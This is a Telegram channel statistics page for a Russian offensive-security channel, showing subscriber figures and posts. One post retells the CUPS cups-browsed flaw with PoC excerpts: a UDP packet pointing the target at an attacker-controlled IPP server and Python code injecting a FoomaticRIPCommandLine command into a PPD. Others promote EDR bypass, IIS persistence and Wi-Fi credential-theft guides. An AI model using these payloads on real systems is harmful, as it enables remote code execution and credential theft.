AD_POHEQUE
Open in Telegram
1 064
Subscribers
No data24 hours
+47 days
+430 days
Data loading in progress...
Similar Channels
Tags Cloud
No data
Any problems? Please refresh the page or contact our support manager.
Incoming and Outgoing Mentions
---
---
---
---
---
---
Attracting Subscribers
March '25
March '25
+23
in 0 channels
February '25
+42
in 0 channels
Get PRO
January '25
+17
in 1 channels
Get PRO
December '24
+37
in 4 channels
Get PRO
November '24
+43
in 1 channels
Get PRO
October '24
+129
in 6 channels
Get PRO
September '240
in 1 channels
Get PRO
August '240
in 0 channels
Get PRO
July '240
in 0 channels
Get PRO
June '240
in 0 channels
Get PRO
May '240
in 0 channels
Get PRO
April '240
in 0 channels
Get PRO
March '240
in 0 channels
Get PRO
February '24
+4
in 0 channels
Get PRO
January '24
+9
in 0 channels
Get PRO
December '230
in 0 channels
Get PRO
November '230
in 4 channels
Get PRO
October '230
in 0 channels
Get PRO
September '23
+14
in 0 channels
Get PRO
August '23
+57
in 0 channels
Get PRO
July '23
+835
in 0 channels
| Date | Subscriber Growth | Mentions | Channels | |
| 31 March | +3 | |||
| 30 March | 0 | |||
| 29 March | +2 | |||
| 28 March | 0 | |||
| 27 March | 0 | |||
| 26 March | +2 | |||
| 25 March | +1 | |||
| 24 March | 0 | |||
| 23 March | 0 | |||
| 22 March | 0 | |||
| 21 March | +1 | |||
| 20 March | +1 | |||
| 19 March | +1 | |||
| 18 March | +1 | |||
| 17 March | 0 | |||
| 16 March | 0 | |||
| 15 March | 0 | |||
| 14 March | +1 | |||
| 13 March | +1 | |||
| 12 March | +1 | |||
| 11 March | +1 | |||
| 10 March | 0 | |||
| 09 March | 0 | |||
| 08 March | +2 | |||
| 07 March | +1 | |||
| 06 March | 0 | |||
| 05 March | +2 | |||
| 04 March | +1 | |||
| 03 March | 0 | |||
| 02 March | 0 | |||
| 01 March | +1 |
Channel Posts
Этот год был непростым для многих из нас. Для кого-то он стал временем серьёзных испытаний, а для кого-то даже потрясений. Я знаю это по собственному опыту. Но если мы смогли пройти через это, значит, мы справились. Мы выдержали. А это уже немало.
Теперь мы знаем, что способны на большее. Пусть Господь и дальше будет на нашей стороне в новом году. И давайте двигаться вперёд — без иллюзий, с ясным пониманием ситуации и готовностью брать своё.
Стремитесь к свету, оставайтесь на стороне справедливости и помните: сила в правде.
Берегите себя и своих близких.
С Новым годом!
👾
| 2 | За этот год я насмотрелся на настоящий цирк в ИБ. Специалисты клепают отчёты ради kpi, пока их инфраструктура гниёт, бюджеты летят на «сертифицированные» СЗИ, которые защищают разве что от здравого смысла. Найм в IT превратился в анекдот: берут кого попало, главное — чтобы покладистый. И девиз у них подходящий:
«Коллеги, у нас много работы, думать некогда — надо работать!».
Как писал Фейербах:
«Высшая степень иллюзорности представляет для них высшую степень святости».
После эфира со Skillbox я написал статью, где разложили всё по фактам. Без прикрас, маркетингового мусора и сказок про волшебные таблетки. Это про то, как построить минимальную, но работающую защиту, а не раздувать бюджеты ради видимости.
Что в статье:
- Как не закопать деньги в бесполезные подписки.
- Как собрать инфраструктуру, которая держит удар.
- Как настроить процессы, которые не развалятся при первом запуске Nmap.
Если вы хотите разобраться, как на практике выстроить процессы ИБ, при этом не попасть в клуб papersec'ов и прочих "воинов бумажных", — эта статья для вас.
👾
https://skillbox.ru/media/code/kak-postroit-bezopasnuyu-sistemu-dlya-it-proekta-layfhaki-ot-belogo-hakera/ | 841 |
| 3 | 👾Подпишись👾 | 874 |
| 4 | Презентация с которой я выступал на митапе 25.10.25 в Bi.Zone.
Разобрал два эффективных подхода для исполнения кода в обход EDR предложенные Фабианом Мошем и Маркусом Хатчинзом.
Эти парни и их исследования часто выручали меня на реальных проектах, считаю их спонсорами моих компетенций.
Актуальности они не потеряли, пользуйтесь.
👾Подпишись👾 | 822 |
| 5 | Есть такая конторка под названием Vulnerability Information and Coordination Environment, или просто VINCE. Работают под патронажем американской Cybersecurity & Infrastructure Security Agency, сокращённо киса CISA.
Всё серьёзно: кибербезопасность от самых "безопасных" безопасников. Инфосеки лютые.
Но самое интересное: им можно сдавать баги. А потом удобно усесться, с чашечкой чая, и наблюдать, как нераскрытые отчеты по уязвимостям внезапно оказываются на breachforums. Вот такой вот "координационный" подход.
😂
А теперь про саму уязвимость.
Если вкратце, исследователь обнаружил что у него по 0.0.0.0 вещает UDP порт 631, после того как поставил Ubuntu на свой компьютер.
Немного погулив, он выяснил, что это сервис cups-browsed, который является частью системы CUPS, и он отвечает за обнаружение новых принтеров и их автоматическое добавление в систему. Linux просто добавляет все найденное в сети, прежде чем пользователь сможет это подтвердить или хотя бы получить уведомление. 😱
Выдержка из PoC.
Шаг 1:
Атакующий запускает вредоносный IPP-сервер, а затем отправляет первый UDP-пакет на целевую машину по порту 631:
0 3 http://<IP-АТАКУЮЩЕГО>:<ПОРТ>/printers/whatever
Это заставит целевую машину подключиться обратно к серверу IPP, находящемуся под контролем атакующего, и раскрыть версию ядра и CUPS в заголовке User-Agent.
Шаг 2:
Это заставляет жертву подключиться к IPP-серверу атакующего и запросить его атрибуты. Сервер отвечает списком допустимых атрибутов, включая последний атрибут, используемый для инъекции команд в ОС:
# ... другие допустимые атрибуты ...
(
SectionEnum.printer,
b'printer-privacy-policy-uri',
TagEnum.uri
): [b'https://www.google.com/"\n*FoomaticRIPCommandLine: "' +
self.command.encode() +
b'"\n*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip'],
Это приведет к:
- Инъекции пользовательских PPD-директив (с двойной кавычкой и новой строкой) в временный PPD-файл. (Баг: строки из атрибутов должны экранироваться)
- Обходу этих проверок. (Баг: пробел, добавленный перед двоеточием, позволяет обойти проверки на основе strncmp)
В результате получим следующий PPD:
...
*cupsSNMPSupplies: False
*cupsLanguages: "en"
*cupsPrivacyURI: "https://www.google.com/"
*FoomaticRIPCommandLine: "echo 1 > /tmp/I_AM_VULNERABLE"
*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip"
*cupsSingleFile: True
*cupsFilter2: "application/vnd.cups-pdf application/pdf 0 -"
...
Этот PPD приведет к выполнению команды echo 1 > /tmp/I_AM_VULNERABLE на целевой машине при отправке задания на печать на поддельный принтер.
🫡
👾Подпишись👾 | 820 |
| 6 | 😃
Звучит как новый вызов. | 691 |
| 7 | Стоит расширять свои компетенции, хоть я и с большой любовь отношусь к продуктам от Windows и их подходу к безопасной разработке
😄
Не так давно читал на хабре статью о безопасности FreeIPA от Всеволода Саломадина из R-Vision.
https://habr.com/ru/companies/rvision/articles/825086/
Пару часов назад на ютубе опубликовали доклад на эту тему от автора статьи.
https://youtu.be/oLGcuta4R-8
Всем приятного просмотра
🍿
PS:
Базовые концепции также описаны в статье на хактриксе, плюс внизу ссылки на цикл статей от SpecterOps, которые определенно будут интересны специалистам по наступательной безопасности.
https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting
👾ЖМИ СПЕЙСИНВЕЙДЕРА👾 | 837 |
| 8 | 😄Ловите новый гайд по закреплению на IIS-серверах через PSWA (PowerShell Web Access).
Как злоупотребить легитимным функционалом и превратить его в свою точку опоры.
Примеры команд, коротко и по делу.
Подписывайся на @ad_poheque, чтобы быть в курсе актуальных методов взлома! 👾
👾 ЖМИ СПЕЙСИНВЕЙДЕРА 👾 | 2 853 |
| 9 | 🚀 Прикури от root'а: как взломать Linux с помощью зажигалки
Бомбовый материал от David'а Buchanan'а — атака с использованием обычной зажигалки для bit-flip'а в памяти! 📲🔥
Исследователь показал, как с помощью электромагнитных импульсов, создаваемых пьезоэлектрическим воспламенителем зажигали, можно вызвать аппаратные сбои в памяти, получить произвольный доступ к данным и поднять привилегии до root на Linux.
Суть эксплойта:
- Припаиваем антенну к шине DDR3 💻
- Щелкаем зажигалкой 🔥
- Ловим переворот бита 🎯
- Эксплуатируем CPython, создавая примитив для чтения/записи в памяти 📜
- Загружаем shell-код и получаем root 🏴☠️
💥 Эта статья замечательная демонстрация того, как изящно можно использовать физические уязвимости для реальных атак.
Полный разбор + код здесь:
[PoC]
[Оригинальная статья]
Берите на вооружение ;)
Спейсинвейдера жми
👾 | 11 363 |
| 10 | +1 wireless_ad_poheque.md | 1 630 |
| 11 | Ломаем Wi-Fi с клиентами и без, грабим клиентов WPA*-Enterprise на доменные пароли в открытом виде.
Шпаргалка представляет собой чёткую инструкцию по атакам на сети Wi-Fi.
Описаны ключевые команды для мониторинга, перехвата рукопожатий, взлома сетей WPA2-Personal и атак на клиентов WPA2-Enterprise. Для тех, кто хочет освоить базовые навыки пентестера и ломать корпоративные сети покуривая сигаретки около офиса Заказчика или попивать чай в кафе где обычно обедает его персонал.
Предложены методы для атак на клиентов через захват PMKID и рукопожатий, а также более сложные сценарии атак типа Evil Twin и MANA.
Это руководство поможет раздобыть учетные записи, хэши и иногда пароли в открытом виде без привлечения внимания клиентов и получить серьезные аргументы для дальнейших атак на целевые корпоративные сети.
Особое внимание уделено использованию eaphammer для эффективного выполнения атак на WPA2-Enterprise и проведения атак методом социальной инженерии через captive portal.
Да, она старая, но актуальности не потеряла. Часто выручала на проектах.
Спейс инведера жми.
👾 | 1 413 |
| 12 | можно еще и на книжках сэкономить 500 рублей. | 1 040 |
| 13 | это напоминание для себя
многое пройдено, большее ещё предстоит впереди
может и тебе пригодится
👾 | 1 067 |
| 14 | Пашка, держись! | 967 |
| 15 | 🤡 | 1 538 |
| 16 | No text... | 1 755 |
| 17 | Happy Supply Chain Attack Friday!
tldr if you updated Kali Linux recently you're pwned with malware
https://twitter.com/kalilinux/status/1773786266074513523 | 2 167 |
| 18 | https://youtu.be/P47V4SASwGc?si=hh7A_8V7gjaNZ3Qo | 2 214 |
| 19 | Нет повести печальнее на свете, чем на бича зарегистрированный киви-кошелек.
👾 | 2 215 |
| 20 | Давно сюда ничего не постил, но тут наткнулся на интересный килчейн построенный на тривиальных техниках.
Посты будут.
Позже.
Работы валом и вам того желаю.
Спейс инвейдера жмём.
👾 | 2 160 |
